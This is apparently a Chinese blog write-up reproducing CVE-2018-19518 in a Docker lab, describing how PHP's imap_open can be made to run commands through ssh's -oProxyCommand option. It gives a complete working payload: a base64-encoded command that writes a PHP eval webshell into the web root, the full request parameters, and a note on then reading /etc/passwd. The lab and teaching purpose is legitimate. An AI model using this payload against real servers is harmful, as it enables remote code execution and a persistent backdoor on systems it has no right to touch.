cve-2018-19518漏洞复现

一、靶场的启动

在相应的文件夹位置打开终端后进行如下操作

1.运行此靶场

sudo docker-compose up -d

2.查看启动环境

sudo docker ps

3.关闭此靶场环境

docker-compose down

二、漏洞内容简介

    php imap扩展用户在php中执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令

    debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等

    ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞

    ProxyCommand用来指定连接到服务器的命令. 其可以是任何的命令,只要能从其标准输入读入数据,然后写出到标准输出即可. 这条命令需要连接到sshd服务器上

访问页面

三、漏洞复现

bp抓包后进行修改

%09后面与|前面为要执行命令的base64

远程执行的rec代码是

echo '<?php eval($_POST[1]);' > /var/www/html/e.php

写入一句话木马到e.php文件下即网页当前目录下

Base64:

ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sL2UucGhw

Payload=

hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sL2UucGhw|base64%09-d|sh}a&username=222&password=333

蚁剑链接

查看/etc/passwd也有权限

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-29 12:38:04       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-29 12:38:04       100 阅读
  3. 在Django里面运行非项目文件

    2024-04-29 12:38:04       82 阅读
  4. Python语言-面向对象

    2024-04-29 12:38:04       91 阅读

热门阅读

  1. ssh连接自动断开的几种可能

    2024-04-29 12:38:04       38 阅读
  2. linux 提权总结_linux提权

    2024-04-29 12:38:04       29 阅读
  3. 阿赵Json工具AzhaoJson的Lua版本

    2024-04-29 12:38:04       25 阅读
  4. 【Spark】读取本地文件

    2024-04-29 12:38:04       34 阅读
  5. rust语言tokio库spawn, blocking_spawn等的使用

    2024-04-29 12:38:04       59 阅读
  6. Element

    Element

    2024-04-29 12:38:04      32 阅读
  7. H3C 交换机配置 IGMP-snooping 注意点

    2024-04-29 12:38:04       41 阅读
  8. SVM中常用的核函数及适用场景

    2024-04-29 12:38:04       37 阅读
  9. Grafana - Configure generic OAuth2 authentication

    2024-04-29 12:38:04       83 阅读